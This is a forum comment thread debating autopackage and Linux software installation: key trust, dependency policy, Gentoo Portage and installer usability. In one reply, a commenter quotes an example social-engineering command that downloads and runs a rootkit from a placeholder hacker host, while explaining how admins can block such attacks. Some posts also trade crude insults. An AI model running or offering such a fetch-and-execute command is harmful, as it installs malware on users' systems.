The problem is that that given the way 0install works... once you have agreed to accept a key, that key now has the ability to access your computer without any further explicit action.

No, it's only used when you upgrade. No incomming connections are allowed; everything is triggered by a local user. For the injector only, you can optionally get it to check for updates periodically. In that case, you have to click Execute to download the program after the update is fetched and you've confirmed you want the new version. If you don't like it, set the freshness to "no automatic updates". However, consider that automatic checks will also warn you if your current software has a security flaw, which is probably a win overall.

If the application is deleted to save space, it will automatically be redownloaded the next time you run it, right?

Yes, but again that's an explicit action on your part. For the injector, you'll have to click Execute in the case of re-downloading.

Right now if gimp.org is compromised, the only people who have to worry about that compromise are peolpe who explicitly downloaded and installed gimp. They know they did it.

Note that the interfaces would typically be GPG signed on a developer's machine. The web server shouldn't have the private key, so a mere server compomise doesn't let the attacker upgrade software without confirming a new key.

With 0install, anyone who clicked on gimp and went off to make a cup of coffee while this fairly large application was started may miss it reinstalling, because it never asked them if they wanted to reinstall it... because it trusted the gimp.org key.

The injector won't download software without you clicking on Execute, so it can't happen when you're away making a cup of tea. Traditional Zero Install (not using the injector) shares updates between users, but some local user still has to trigger the update.

Re:Interesting criticism of the OSX DMG

[argent]

OK, it sounds like it's not as bad as I thought.

It still gives me the collywobbles.

Oh, when I said gimp.org might be compromised, I should have made it clear that I was talking about a key compromise.

Anyone can have a key compromise, or keys issued without their knowledge. Microsoft's had that happen to them, even. That's why you DON'T want to trust any key without human intervention. Keys make things harder, but humans in the loop are the final barricade.

Re:Interesting criticism of the OSX DMG

[be-fan]

The error message needs to be improved, but that's trivial. The authentication only needs to be done once, so that's no problem.

I'd try it out, but..

[phaze3000]

I'd love to try it, but:

sam@callisto:~$ apt-cache search autopackage
sam@callisto:~$

Damn, no Debian package for it. Oh well.

Re:I'd try it out, but..

[meheler]

That's not really the point. When you download and execute an autopackage, it will download and install the latest version of the autopackage software.

Re:I'd try it out, but..

[petrus4]

>Damn, no Debian package for it. Oh well.

What sort of mindless sheep are you? Heaven forbid the idea that you either
a) Make a .deb file yourself, or
b) Compile/install it outside of dpkg (horrors!)

Forgive me, though. I realise that following either of those suggestions would require using your own brain and your own initiative, which going by your sig as a George W Bush supporter, probably *is* a little too much to ask.

I think its a good effort, well placed

[floydman]

Been using linux for several years, on several distros, i can use rpm, apt-get, no problems, they are prety reliable if you are technical enough to know what you are doing.
But the problem here is someone like my sis, who doesnt bother to know all the -ivh flags to install her basic moral chat needs.

Re:nextgen already here: emerge

[linguae]

Even though I'm fond of Gentoo due to its "nextgen packaging system", Gentoo isn't an operating system for the proverbial Joe Average. Don't get me wrong, Gentoo is a fine operating system, but it is too high maintenance for the less technically inclined. We may like upgrading our operating system weekly, keeping track of the latest software, tweaking our compiliation options, recompiling our kernels, etc.

However, Joe Average doesn't feel like downloading and compiling the latest sources for his operating system, or upgrading his ports system weekly. What Joe Average wants is to be able to download and install software with easy to use graphical tools without any trouble. Joe Average doesn't care about RPMs and tarballs and all of this other package nonsense. Joe Average just wants to sit down and check some mail, watch some DVDs, chat up a storm with his friends, surf the web, and get some work taken care of; without much trouble. If Joe Average wants to download any Linux software tool, he should be able to do it without too much difficulty.

If you don't like this autopackaging system or any other of the usability enhancements that Linux distributions are getting, well, you don't have to use them. But all that I'm saying is that even though Gentoo is a very fine operating system, it isn't suitable for everybody.

dependency inclusion would be great

[simetra]

One thing that bugs the crap out of me is trying to build something to find that it needs version xxx of yyy, which in turn needs version zzz of aaa, which in turn needs version ddd of qqq, etc, etc, etc. Why not have everything it needs bundled up nice? Then when the installer/builder/manager tries to install, prompt the user if xxx, zzz,yyy, etc, should be installed as well?

Packaging will stop being an issue when...

There is greater standardization of referencing things outside a package.

We need to be able to reference an entity outside the package, which means unique names. We need to be able to stipulate in varying degrees of strengths version requirements. For instance if I need version 3, then I use the generic reference and refer to the version, if I need, anything that can do everything that version 3 can do then using that is fine to and should be supported, 3.x, perhaps? We need to standardize WHAT version numbers mean, not the even/odd stable/unstable, but more in line with does this break API and/or ABI or not. If that entity must also have an optional feature built into it, there must be a sub-reference with a version association made separately by the querying package, just as if we were querying a package, so it's recursive.

This would be easy if we could use, oh I don't know, URIs! Which work out quite nicely for this stuff. zero-install does this, but it has other issues, like dependency on a kernel module, they're getting away from it, in fairness.

Now entities can be services, libraries whatever. But we should be able to name them and version them. They should publish what standards they support, that information should be queryable in a standard format.

And, no, it's not all that much work. The LSB and numerous other standards already exist, people need to talk to each other more and then think about what to do rather than simply do and then go crap, we can't go farther because of x, y, z.

It's all a question of integration, it's getting there, hopefully, it'll get there faster, how's tomorrow for everybody?

Website packaged

Seems the website has been packaged..

plenty of UI and Usability mistakes

gleened from the flash demo

progress meters or UI el;ements that look like them do not go back and forwards, if you want pretty animations dont use already established interface elements, you are just going against what the user has already learnt about installers and what progress meters look like/their function

make your dialogs all the same size/look, the first dialog and the password prompt one is not consistant with the rest of the installer, it should be the same UI from start to finish

no cancel button, i should be able to cancel at any time, if i cannot then of remove the button (do not grey it out whatever you do as there is nothing worse than seeing a cancel button you cannot click on) the installer should be able to reverse any changes silently

dont ask for passwords if they are not needed, ( the "use no password box" is redundant) again the UI should be consistant throughout

progress meters should accurately reflect the install processes completion, i shouldnt see anything happening to the system beyond 100%
why have a progress meter for extracting files but nothing else ? does the user care about files, or do they care about is the whole thing finished ?

the uninstaller said one package needed root access to uninstall yet had no option to enter a root password (other than logging out/in of the system or running it in su)

go look at a WISE windows installer/process and see how they do it, replicate or better it on *nix and you will be onto a winner

--AJ

Re:plenty of UI and Usability mistakes

[IamTheRealMike]

Yes we know the bouncing progress bars suck. I yelled at people about that a few days ago. Expect them to disappear as time goes on.

Dialogs same size - not sure there's any point to this. Dialogs that don't fit their content are just weird. Making them all the same window is technically very hard because of the need to run different programs to re-authenticate etc. Yes yes, excuses, but software is compromise.

No cancel button: where is the cancel button? You cannot cancel an install, so there should not be one. The closest I can see is Hide which is different.

Don't ask for passwords: you need the root password for software to be shared, and various things work better when software is installed system-wide. The "No password" button is there for setups where you are not the administrator rather than for home users. Long term authentication-less software installation should happen but it's a big step that neither MacOS X nor Windows have fully taken yet, it requires a lot of thought and technology to ensure it's done correctly.

Progress meters: yes, from a pure UI perspective you are correct. However it's hard to know how long things will take because the packager has complete freedom to do whatever they like. It's not deterministic, in other words. Again, compromise. Long term this whole UI will disappear in favour of drag/drop installs anyway so there's not much point in polishing it too much.

The uninstaller will prompt you for the root password once you hit "Remove". It's just not shown in the Flash demo.

Thanks for your comments!

Re:plenty of UI and Usability mistakes

[Master+of+Transhuman]

Good analysis. Perfectly correct. I can't count how many times I've noticed some idiot progress bar that says "100%" - and then sits there for five minutes while something else goes on...

Just about as bad as Windows telling me it will take ten minutes to copy a file - which is then done in thirty seconds to be replaced by another file which will take five minutes - and takes ten...Christ, don't even bother if you can't be accurate!

I mean, this sort of thing really demonstrates to me that the developer was too lazy to test his installation method and just doesn't care that it looks and acts sloppy.

This sort of thing is endemic in the whole software industry.

Re:plenty of UI and Usability mistakes

[FooBarWidget]

"progress meters or UI el;ements that look like them do not go back and forwards"

What? The Human Interface Guidelines explictly tells me to use that kind of progress bars for operations with unknown duration. I'm just following the HIG. How's that a usability mistake?

"make your dialogs all the same size/look"

They would look really ugly if they're all the same size.

"no cancel button"

This is a technical limitation and can't be done. The cancel button is removed on purpose.

"dont ask for passwords if they are not needed"

The thing is - they are needed. How else do you want to find out whether the user wants to install as root or not?

"progress meters should accurately reflect the install processes completion, i shouldnt see anything happening to the system beyond 100%
why have a progress meter for extracting files but nothing else ?"

Because it's technically impossible. Again - this has been thought of. It cannot be done.

"the uninstaller said one package needed root access to uninstall yet had no option to enter a root password"

Are you sure? It asks the password for me.

Re:plenty of UI and Usability mistakes

[Shotgun]

Have you considered tying in directly and pulling the packages from a service like BitTorrent? As often as not, I try to install a piece of software that doesn't come with the Distro, run into dependancy hell, and then spend hours Googling for the dependancies before giving up in frustration.

It often happens that a developer specifies a library at http://www.foo.org/depository/bar.lib, and by the time you come along six months later, foo.org has shut down. Let everything float in the BitStream, and we won't have to depend on foo.org and we give more legal uses to BitTorrent.

Funny

[shwouchk]

Dont you feel it is quite humorous that just about everyone here said 'just before you start bashing, this is so good' and such and no one is even bashing it?

Re:Funny

[Master+of+Transhuman]

No one is bashing it?

Half the comments I read were bashing it - most without having read the FAQ.

I'm not supporting this yet until I see developers pick it up, use it, and I get to use it to install something and find no problems. But the Flash demo looked very nice to me. Easier than installing Windows software, evidently.

portage?

I hope they integrate a version tracker or portage system with autopackage so those easy to install packages stay up to date.

Re:nextgen already here: emerge

[St.+Arbirix]

Portage would never be ported (no pun intended) to *BSD, because we already have Ports.

Don't tell these people.

Re:nextgen already here: emerge

"The whole reason many people use gentoo is b/c it is so easy to install software"

Hmm.

--
$ emerge --pretend --update world
These are the packages that I would merge, in order:

Calculating world dependencies /
!!! All ebuilds that could satisfy ">=dev-libs/boehm-gc-6.4" have been masked.
!!! One of the following masked packages is required to complete your request:
- dev-libs/boehm-gc-6.4 (masked by: ~x86 keyword)

For more information, see MASKED PACKAGES section in the emerge man page or
section 2.2 "Software Availability" in the Gentoo Handbook.
!!! (dependency required by "media-gfx/inkscape-0.41" [ebuild])

!!! Problem with ebuild media-gfx/inkscape-0.41
!!! Possibly a DEPEND/*DEPEND problem.

!!! Depgraph creation failed.
--

OK, so that's my fault - I've unmasked Inkscape and now the latest masked version has another masked dependency.

There's two problems here.

1) I had to unmask some packages to get them to work. Notably Meld, which has been unmasked since I first tried to install it last year and discovered that the "stable" ebuild was actually completely broken and wouldn't even compile. There were lots of posts on forums and bug reports about it for months but it remained broken, the standard solution was "unmask it and use a newer one, they work fine!". So, there's some slack QA going on somewhere - either the new packages are OK to unmask and it should be done upstream or the old one should be fixed. Inkscape was similar, but not quite as severely broken. aMule is the same - the "stable" 1.2.8 version in Portage is actually extremely unstable and buggy, and it's presently impossibly to build any of the (much more stable) 2.0-pre series without doing a USE="-GTK2" and getting a seriously ugly GUI.

2) Emerge is bombing out cheerfully when I try to update purely because it's hitting one dependency problem on Inkscape. It would make more sense for it to ignore any available updates to Inkscape and try to update the rest of my software, like Firefox. Maybe there's an obscure switch for this I haven't read up on, but it's hardly "... so easy to install software!".

Gentoo is technically quite interesting, but it has the occasional package management snarl-up - just like all the other distros!

Autopackage seems like a good idea to me too, though.

What about Java applications?

[roskakori]

I read the developer quickstart guide, and still can't figure out if this will help me with integrating a Java application.

Right now, I use an installer based on IzPack, which works but results in an application that must be started from a shell script and does not integrate in the desktop. In particular, the user can not just double click files that have been created with my application. Also annoing is the fact that the installer includes trivial libraries like log4j, which causes bloat. And worse, some libraries have to be downloaded manually, in my case JAI. I'd say my application is a horrible user experience under Linux.

However, the developer quick guide just keeps talking about about C compilers, GTK and other stuff I don't use or care about. Is there any point in taking a closer look at autopackage?

Re:What about Java applications?

[FooBarWidget]

Well, I tried packaging a Java app before but I gave up. It's just not possible to provide an easy installation experience, because of the Sun JVM, which is proprietary. I cannot auto-install the JVM because of the license, which prohibits distribution. You *may* be able to get away with this if you compile your app with GCJ but GCJ does not have a stable ABI...

This looks just wrong

[eldacan]

Is it really supposed to be a good alternative to traditional debian packages? I talk about what I (thin I) know but I'm sure other distributions have the same concerns:

Why is debian so good? Not because software installation is so easy. Of course it's important but the thing is every debian package has to follow strict policies to get accepted by the ftp masters.

Also, according to the FAQ, software installed through Autopackage won't be known to dpkg (and apt-get, etc.). They say they want to integrate with rpm, but nothing about deb...

According to the FAQ autopackage is not adequate for packaging C++ programs (because of gcc's ABI instability).

Finally, I doubt these packages will ever use things like the debian "alternatives" and other particularities which make a debian system.

I won't consider such a regression anytime soon.

Re:This looks just wrong

[Master+of+Transhuman]

Fine.

Those of use who don't use Debian salute you.

Re:This looks just wrong

[IamTheRealMike]

Of course we want to integrate with DPKG as well, why would we not? It's just easier to use RPM as a shorthand for "RPM and all systems like it", that's all.

You can package C++ programs with autopackage, Inkscape is an obvious example. The big issue is with KDE apps because they link to huge C++ ABIs. Debians packaging system doesn't solve this problem, it merely hacks around it by forcing you to upgrade everything at once (except when it doesn't).

We have kicked around a few ideas for improving the C++ support in autopackage. For instance, using xdeltas to ship both ABIs in one box. As the ABI differences between gcc 3.3 and 3.4 are quite small this may prove effective. So far nobody has stepped up to implement this though.

Using systems like alternatives (which is btw implemented on Fedora too) is perfectly possible: tight integration has always been a goal. There would need to be some API to abstract this out but that's not too hard.

Re:This looks just wrong

[eldacan]

Thanks for the answer. I'll keep an eye on it then...

Dependency policy?

[Somnus]

autopackage's dependency policy concerns me. They argue that rapidly changing deps should be incorporated into a package's codebase, and that conditional deps should be handled at runtime with dlopen() or using their C(++) specific "relaytool".

Two questions:

* Even stable packages can have unstable APIs, e.g. GNOME with their timed release cycles. GNOME apps not distributed with GNOME rely on detailed dependency resolution for safe operation. Shouldn't the automation of this be the primary goal of a tool like autopackage (or emerge, urpmi, etc. etc.)?

* How can the user tweak the functionality, i.e. does he have to manually install a conditional dep, so that some functionality magically starts working in his package of interest? For example, I install evolution, but to get Palm-syncing capability, I have to manually install the gnome-conduits package? This requires extra knowledge in the user, or some notification from the package of interest.

Re:Dependency policy?

[IamTheRealMike]

To answer your questions:

• The GNOME APIs aren't unstable, far from it. They are very stable. So this is not a big problem. Now, if you want to use very new APIs not all your users have yet, whilst falling back to the old ones, relaytool can help you there - the Fyre package is a demonstration of doing this for the old/new GTK+ filepicker.
• User tweaking functionality, yes you have it pretty much right. With weak linkage stuff will magically start working when you install the right package. Autopackage understands the difference between a required and recommended dependency and will tell the user about missing recommended deps at the end of the install in the summary screen. It's not perfect, but it works. We really need a Desktop Linux Platform to go further here.

Re:Dependency policy?

[Somnus]

Criticisms:

* relaytool is C-specific, and it would be impractical to establish something similar for all the languages and ABIs out there. Instead, I would recommend 2nd level dependencies (i.e., package X requires Y to have been built with Z) to deal with ABI and even API shifts. I recognize that this complicates binary distribution; am I thinking too Gentoo-ish?

* Instead of suggesting to the user to install recommended package Y for primary package X, perhaps his autopackage UI can ask him which recommended packages to install, at the time he is installing package X. Then, the autopackage database can keep track of the his prefs for package X, and resolve forward and reverse Y dependencies transparently.

Re:Dependency policy?

[IamTheRealMike]

Actually relaytool can work for any language GCC supports, so that's C/C++/Java/Objective-C and a few others. However you are right. Relaytool is a hack. Better solutions involve modifications to ELF (eg DT_WEAK_NEEDED) or the use of LLVM.

Not falling back when things are missing isn't really an option, the aim is to make installs as easy as possible so having minimal dependencies is crucial. Requiring people to have features XYZ compiled in is rather Gentooish: most non-technical users won't understand what this problem is let alone how to fix it.

Tracking user prefs, yes maybe. Right now user interaction is banned so we can support drag/drop installs though. Hmm.

Re:Dependency policy?

[Somnus]

Not falling back when things are missing isn't really an option, the aim is to make installs as easy as possible so having minimal dependencies is crucial. Requiring people to have features XYZ compiled in is rather Gentooish: most non-technical users won't understand what this problem is let alone how to fix it.

I was thinking that this could be handled transparently: user wants some feature in a package, then autopackage fetches the right dependency chain to make this work. The difficulty here is that each of packages in the dep chain must exist, or there must be a facility to build it.

Tracking user prefs, yes maybe. Right now user interaction is banned so we can support drag/drop installs though. Hmm.

Something to think about.

I use Gentoo/Portage because I can manage these issues with USE flags, rebuilding and simple-to-write ebuilds; Red Hat/RPM was painful because I found myself writing my own spec files. If autopackage can handle these problems while still delivering binaries, I'm sold.

Re:Dependency policy?

[IamTheRealMike]

We already do that, using the recommended() call instead of require() will cause autopackage to try and resolve the dep if possible, if not it won't halt the install though. So we already do a best-effort attempt to install every feature possible.

Re:Dependency policy?

[Somnus]

* Is it necessarily desirable to attempt to install every feature possible?

* When a user complains that some feature is not working in a package, what then?

I think some user interaction has a role here. Autopackage should query the user on what conditional deps to install, as well as report any unsatisfied deps. This way, the user knows what feature is or is not installed, and why. He can then file a request upstream, either himself or through the maintainer of the primary package; maybe forward a bug report from some "Advanced" dialog.

There is still the issue of higher order dependencies, but even Portage has yet to have a transparent solution for that ....

Re:Dependency policy?

[IamTheRealMike]

Possibly not, but very few packages do this right now. I think we need more real world experience first.

When a feature isn't working in a program because a library is missing there is nothing to stop that program telling the user to install XYZ library to get that feature, and in future with a PAL doing it itself MSI-stylie.

Finally yes, reporting back to the packagers which deps fail most frequently is something we want to do (so people can get a better understanding of what problems their users are having).

Re:Dependency policy?

[Somnus]

[...] in future with a PAL doing it itself MSI-stylie.

I'm not familiar with those acronyms.

But I get the gist of it -- thanks for discussing with me. I will be watching autopackage's progress with keen interest. In particular, a distro based on autopackage, showcasing its ease of use and developer friendliness, might hasten its adoption.

Re:Dependency policy?

[FooBarWidget]

That would not be a good idea. Autopackage is not designed for distribution core packages, it's designed for third party desktop software.

Packaging GNOME?

[Deraj+DeZine]

I remember looking at this project when it was in its earlier stages and I thought the roadmap said something about trying to package GNOME into an autopackage. Has this been done, or do you think this is possible?

Missing the point

[theantix]

"To me it seems like anything that makes it easy for users to install random software off the internet to be a REALLY BAD THING."

This is hardly the point of the project.

Sadly, that is the point of the project. It's meant to aid the installation of packaged software from third party sources and manage dependancies in order to accomplish this. That is specifically my problem with it, it is a tool for enabling dangerous behaviour for unexperienced users.

Anybody who says EVERYTHING they'll ever need is included in their distro is just being a troll. Because it simply is not possible that ANY distro is "finished." And a lot of people don't want to wait months until something they want shows up in a repository.

I think you mistake the difference between "need" and "want". They are different, you know. So I will tell you that if you are using Mandrake, Fedora, Ubuntu, Gentoo, or any other popular distribution: there are no programs that an inexperienced user *needs* that do not come in their software repositories. Just because you are impatient and cannot wait a few months doesn't make your desire a neccessity, eh?

And I have NEVER had a spyware/virus/trojan problem from such software. (Although I have had software that simply screwed up the machine due to stupid programming.)

Shit, I didn't read that until now. I actually did think you were serious at first. Ah well, you got me.

Re:Missing the point

[Mr.+Slippery]

there are no programs that an inexperienced user *needs* that do not come in their software repositories.

Wow, you know the software needs of all users? How's the omniscience working out for you?

Yes, peole need to think before installing software. That doesn't mean thr process should be hard - in fact, making it artifically difficult encourages people to find unsafe and stupid ways to do things that get around the restrictions.

Re:Missing the point

[tepples]

there are no programs that an inexperienced user *needs* that do not come in their software repositories.

Which recent major 3D video game comes in a distro's repository? What about image editors with still-patented prepress color manipulation methods?

Re:Missing the point

[Minna+Kirai]

. It's meant to aid the installation of packaged software from third party sources and manage dependancies in order to accomplish this. That is specifically my problem with it, it is a tool for enabling dangerous behaviour for unexperienced users.

The factor blocking the deployment of "malware" to Linux isn't the intractability of Linux software installing, but the low population size of unskilled users, and the low explotiation value of that population (same as the largest reason there are few "viruses").

Do not imagine that if Linux had the popularity of Microsoft(tm) Windows(r), it would take the malware coders more than a week to get into business. All they need is to provide executable files to run, and end-users they can convince to download files and then double-click them (assuming that Linux web browsers continue to non-autoexecute downloaded binaries). Once they've run that one binary, it can either execute the malware immediately, or merely install it in the user's writable disk space (including ~/.login, as well as ~/.firefox and maybe elsewhere)

If a system administrator feels his users at risk of installing malware, she is well able to disallow execution of files in their homedirectories. This will prevent home-grown attacks (like "paste these 3 lines into a terminal: wget http://download.hacker.com/rootkit;./rootkit"), and also make autopackage impotent as a side-effect. (An admin with this attitude would also disallow users from running autopackage at all, of course)

Re:Missing the point

[Taladar]

Gentoo has most recent (3D and other) commercial games for Linux in the portage tree. The same applies for most of the packages other distros can not put on their cds because of license restrictions.

Re:Missing the point

> it is a tool for enabling dangerous behaviour for
> unexperienced users.

So is rm. Now STFU with your nonsense.

Re:Missing the point

[Master+of+Transhuman]

Look, moron, here are the facts.

Autopackage is no more a tool for dangerous practices than configure/make/make install.

You CANNOT override root with this system any more than you can now.

And you "want" vrs. "need" is utter bullshit. Anybody who says everything is in a distro - or even in a distro repository - is a complete idiot. New stuff of value comes out every day and I for one don't intend to sit around waiting for somebody in a distro that can't even field-test parted on a dual-boot machine (which caused the problems with Fedora and Mandrake last year) to get around to "certifying" some piece of software.

Also, moron, I was entirely serious about NEVER having got any malware from ANY source (except one program (a Windows program, natch) I got from a P2P network, which my AV detected instantly).

You're full of it. You imagine yourself Dictator of the OSS world. You're nothing but a troll who comes up with stupid arguments about a new system you know nothing about. Fuck off.

MOD PARENT UP

As a Gentoo user I wholeheartedly agree with the above. It's not a troll. There's a certain proportion of the Gentoo userbase who are, to put it nicely, idiots. They hang around Slashdot and post "... but Gentoo does it better!" on every story about Linux, distributions or package management. Or, indeed, entirely unrelated ones.

They're morons, and not representative of the wider Gentoo community who are otherwise represented by people who write EXCELLENT documentation and develop a very pleasing distribution. Most people who give Gentoo a go find it quite a nice OS, assuming they're somewhat technical minded and like the command line. However there's a few of the boy-racer types who come from the "my-car-is-better-because-it-needs-fixing-every-we ekend" school of thought who like Gentoo because they can cripple their system constantly by repeatedly recompiling Xorg with ever more ludicrous compiler flags.

They're morons, and it's not trolling to call them morons. MOD PARENT UP!

A Flash demo?

[Money+for+Nothin']

Does anybody else see the irony in developing a demo of a Linux app using a format that cannot be developed natively on Linux?

Next thing you know, they'll be writing a VB interface to autopackage...

Re:A Flash demo?

[Master+of+Transhuman]

Since some other idiot posted the same irrelevancy elsewhere, yes, somebody else sees the irrelevant irony.

Who cares - beside you and him (and maybe Stallman)?

Re:A Flash demo?

Actually, swf is an open format and the demo was made with vcn2swf, an open-source program.

Re:A Flash demo?

[Money+for+Nothin']

Do you have a link to "vcn2swf"? I googled it and turned up nothing.

Also, SWF is not Flash, and is not an entirely-open format although Macromedia makes the standard available to interested developers. So, AFAIK, my initial criticism still stands, although, I'm *far* from knowledgeable about Flash, SWF, etc. development...

Re:A Flash demo?

Well, anybody who promotes the idea of "Linux on the desktop" ("coming to your desktop Real Soon Now!"®) ought to care, if they are to have any intellectual honesty at all.

Then again, such honesty is, and always has been, in short supply; hence, *some* people naively refer to such an issue as an "irrelevancy"...

In fact, however, the issue is not "irrelevant", because when I worked for a now-defunct small Linux company about 4 years ago, we ran into the exact same problem: that of creating a Flash demo for a service we were selling. One of our bigger secrets was that the demo was created on Windows running in VMware on Linux, because WINE wasn't up to snuff to run the Flash 4 dev. product natively on Linux. (note: I didn't work on the demo at all, but I worked with people who did.)

So it matters -- not just to Stallman, not just to the grandparent, but to the business community as well. Who cares? Everybody with money and/or intellectual honesty cares. I'd hardly call those people "irrelevant"...

Re:A Flash demo?

[IamTheRealMike]

He means vnc2swf, and yes the demo was made using only free software. I have not checked if swfdec can play it, but I suspect it can as the subset of flash used is quite basic.

MOD PARENT FUNNY

C'mon, kids. It's a JOKE.

I think.

I hope.

I tried out an autopackage...

[agraupe]

and I was amazed by how well it worked! I think this could easily be the answer to the linux software installation problem. I am a gentoo user, and I like portage, but autopackage is a slick piece of software. Perhaps it could be used in conjunction with portage (i.e. remove the idea of "gentoo packages" for end-user-type-apps and make portage interface to autopackage). Either way, I think that a stable Autopackage definitely is a step forward for desktop linux.

Userspace stuff

[bungley]

Hi,

I'm at uni and on their machines it's impossible to install stuff as root, so when I need something I have to install it in my homedir or /tmp. This is fiddly as hell, especially considering usually has to be done from source.

Can autopackage handle such installations (not having root, not knowing if a file is going to be persistent between logins, capable of running alongside another few instances of it)? Are there any other package managers which can?

use dijjer instead

[goombah99]

Dijjer is like on-demand bit torrent. No set up at all. no servers you have to establish. If this catches on the entire interent will work p2p and no one will need a powerful server or mirrors.

Mike's impatient with LSB and GCC progress

I have a lot of respect for Mike,
but I disagree strongly with him on this.
(We've discussed it before; see
http://www.winehq.org/hypermail/wine-devel/20 04/11 /0489.html)

He's essentially unwilling to wait for the
slow process of completing the LSB and
making GCC's C++ ABI fully standard compliant.
I can't blame him for being impatient, and
trying alternate paths towards application
portability, but I am willing to bet him
a rib dinner that the slow process being followed
by the LSB and by GCC will ultimately succeed
where his quick 'just solve the problems NOW'
approach will not achieve wide use.

He thinks what the LSB should be doing is defining
a stable ABI for things like Gnome and Qt,
and it's wasting its time defining an ABI
for all the stuff that's so stable
it already works on all Linux systems --
as long as you build from source.
Well, heck, why should we require people to
build from source? We *need* an ABI for that
boring old stable stuff so that people can
compile once and run everywhere. Java developers
have this, pretty much, and it makes life
soooo much more pleasant.

He's also completely unfair in criticizing
gcc's c++ ABI behavior. gcc and several
other C++ compilers (including icc) implement the
multivendor C++ ABI defined at
http://www.codesourcery.com/cxx-abi/abi.html
I suspect most of the ABI breakages in GCC were
there from Day 1, and each time they fix one
of them, they're moving gcc closer to ABI
compliance. To users, this feels like constant
ABI breakage, since object code produced by
versions of g++ before and after the ABI fix
can't be mixed, but each fix increases the
likelihood that C++ object files built by
different vendors' compilers can be mixed in
the same program. I say a little pain now is
well worth it for the eventual payoff.

Time will tell whether Mike or I are right,
but if Mike's in a betting mood, I'd be more
than happy to accept a wager.

Re:nextgen already here: emerge

[theLOUDroom]

That's fine for advanced users who can handle the command line but what about the remaining 97% of the world?

If you can't handle a command line you probably don't want to be running unverified, alpha software.

Pretty much anything your average joe is going to want IS in portage. The stuff that isn't is generally really specialized, or not quite there yet in terms of features and stability.

....of course one might wonder how you got Gentoo up and running in the first place since use must you the command line to even install it.

Re:nextgen already here: emerge

[ZephyrXero]

I never said I was part of that 97% jackass...

After..

[anethema]

Reading the faq, seeing the demo, and hearing the talk, this sounds like the holy grail of linux.

While I am somewhat happy with ./configure && make && make install, it is really hard to uninstall if you didnt keep the source directory and cant find the package again.

I will be installing and using this every chance I get. (assuming it lives up to its hype.)

Re:After..

[51mon]

The GNU project has a tool for tracking where stuff goes from "make install" so you can remove it, not that I think that is anyway to manage a system just thought you might like to know.

Re:After..

[anethema]

cool thanks for the info.

Klik is easier ..

[Jerry]

to use to add or remove programs.

http://klik.berlios.de/

Suggestion

[3Kirt]

Trying to install autopackage on ubuntu is slightly broken since it asks for the root password when there isn't one. Maybe check if the root account is disabled and use sudo if it is? Still works though, just can't install anything system-wide. :(

Re:nextgen already here: emerge

[theLOUDroom]

Plenty of people do, plenty of people don't. Unless everyone does it, you can't assume it will be available for what you need.

Which could be said about any package format.

The nice thing about ebuilds, as opposed to binary packages it that so long as you have libraries installed that can work with foobar, you can install foobar. If you have a binary package for foobar, it might demand a specfic library version of "stuff", or specfic compile-time flags for "stuff". Then you go download a package off somebody else's site and it turns out that one wants a different, INCOMPATIBLE configuration of "stuff".

So yes, you have these two binary packages that should work, but they don't.

I remember for example fighting with mplayer (wants GCC 2.95) and redhat (wants GCC 2.96), back in the days that I used redhat.
There is nothing autopackage would have done to solve that problem, because it's a binary packaging format. Keeping track of where the files go is only part of the battle, you also need to be able to use a set of dependencies that actually work together.

A bunch of random people distributing binary packages in ANY format doesn't solve this, and if you create a central repository, what advantage do you have left over gentoo? You're still tied up waiting for things to get into the tree, but now your hands are tried WRT to things like what libraries you're going to use.

Speaking as a BSD guy...

[ArbitraryConstant]

I don't hate Gentoo guys for bringing Portage to BSD. I dislike Gentoo zealots because they're really annoying, and I dislike Gentoo because it breaks itself without my help.

It only has half of the BSD philosophy. Good docs by Linux standards, and a centralized mechanism to install most 3rd party software, but terrible reliability.

The BSD philosophy includes a distaste for unreliability and breakage. We'd rather be a bit slower and a bit out of date than bleeding edge if it means we don't have to go around tracking down breakage.

I've tried Gentoo, and I loved how easy it was to install the most up to date software. However, I took a look at myself after a month or two and realized I was spending a lot of time cruising the formus, trying to find out why my system broke itself in the last update. I couldn't assume my system would be up and running at any given time, and I simply wasn't willing to put in the time it takes to keep that from happening.

I still need a Linux for various reasons, and I'd still like it to be up to date-ish. But Gentoo can't give that to me with the time I'm willing to put in. However, Gentoo did convince me to move my home directory to a BSD machine, and then export it via NFS. That way I can jump ship and move to another Linux (or BSD) at a moment's notice, without worrying about whether my filesystem is supported or any of the other issues that make changing OSes annoying.

Re:Speaking as a BSD guy...

[marcansoft]

I've been using Gentoo for a long while now. No breaking on updates, except maybe some updated library that needs re-emerging of the apps that depend on it (mysql -- and note this was because I installed an unstable version -- and directfb come to mind)

You really *do* know how to properly update your config files, don't you? and you *aren't* running ~arch, are you?

Re:Speaking as a BSD guy...

[ArbitraryConstant]

"You really *do* know how to properly update your config files"

Yes. I never got breakage because of this.

"and you *aren't* running ~arch, are you?"

No. The warnings in the docs about this were quite clear.

The worst stuff was things like "stable" packages that had masked dependencies (eg famd and KDE, I forget which versions), and USE flags that change their meaning without any warning (Xinerama went from default-on from default-off).

I guess it just depends on your timing, but that's the point. I'm not comfortable with a system that has no assurances in place to make sure the "stable" branch is buildable at all times. People said it had improved when I tried it again late last year, but I had exactly the same issues, so I've pretty much given up on Gentoo for the forseeable future.

Re:Speaking as a BSD guy...

[marcansoft]

Actually there is one thing I don't like, I forgot to mention on the original post. Sometimes, newer versions get more USE flags. I hate it when I update and find out that some features are missing now. But then, this just means I should review the USE flags in emerge -upv before running the real thing.

Oh, well. Anyways, I'll stick with Gentoo. Other distros have far worse problems IMO. I guess it depends on your priorities.

Re:Speaking as a BSD guy...

[ArbitraryConstant]

"I guess it depends on your priorities."

Exactly. That's exactly it. My priorities are incompatible with Gentoo, yours are very much compatible.

"Other distros have far worse problems IMO."

Well, that depends on your priorities.

How about autopackage at the source level?

[Storlek]

I'd like to see a GUI wrapper around ./configure && make && make install -- a window with checkboxes for all the different --enable and --with options, a button to change what directories the program is installed to, and a "build" button at the bottom. Do all the configuring in a hidden embedded terminal widget, and have a "details" button for people who really want to look at the stuff scrolling by. It could be written with PyGtk (or whatever else; maybe it could even detect KDE or Gnome and use the appropriate toolkit) so it'd run on any architecture, maybe even have extensions to call apt-get or rpm to automatically resolve dependencies for the major distributions.

This could even be done with a shell script wrapper around a tar.bz2 file (think shar, or the old StarOffice installer), so when it's double clicked in the file manager it would untar itself into a temporary directory and install.

Re:How about autopackage at the source level?

[mp3phish]

" I'd like to see a GUI wrapper around ./configure && make && make install -- a window with checkboxes for all the different --enable and --with options, a button to change what directories the program is installed to, and a "build" button at the bottom. Do all the configuring in a hidden embedded terminal widget, and have a "details" button ... ... ..."

